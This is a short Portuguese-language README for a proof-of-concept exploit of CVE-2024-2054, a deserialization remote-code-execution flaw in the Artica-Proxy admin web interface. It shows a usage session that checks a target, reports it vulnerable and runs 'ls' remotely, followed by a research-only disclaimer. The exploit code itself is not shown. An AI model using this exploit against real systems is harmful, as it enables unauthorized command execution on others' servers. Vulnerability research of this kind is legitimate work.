
Prova de conceito de exploit para CVE-2024-2054, demonstrando RCE por desserialização insegura na aplicação web administrativa Artica-Proxy. Inclui execução de comandos e verificação de vulnerabilidade.
Uma prova de conceito de exploit para a aplicação web administrativa ARTICA PROXY CVE-2024-2054
Mais detalhes aqui: https://blog.sonicwall.com/en-us/2024/03/unpatched-php-deserialization-vulnerability-in-artica-proxy/
$ python3 CVE-2024-2054.py
Enter url: https://8X.XX.XX.X4:9000
Vulnerable
enter command: ls
assets
index.html
wiz.upload.php
wiz.wizard.php
wiz.wizard.progress.php
Esta POC foi criada puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usada para atacar sistemas, exceto quando explicitamente autorizado. Os criadores/mantenedores do projeto não são responsáveis pelo uso indevido do software/POC. Use com responsabilidade.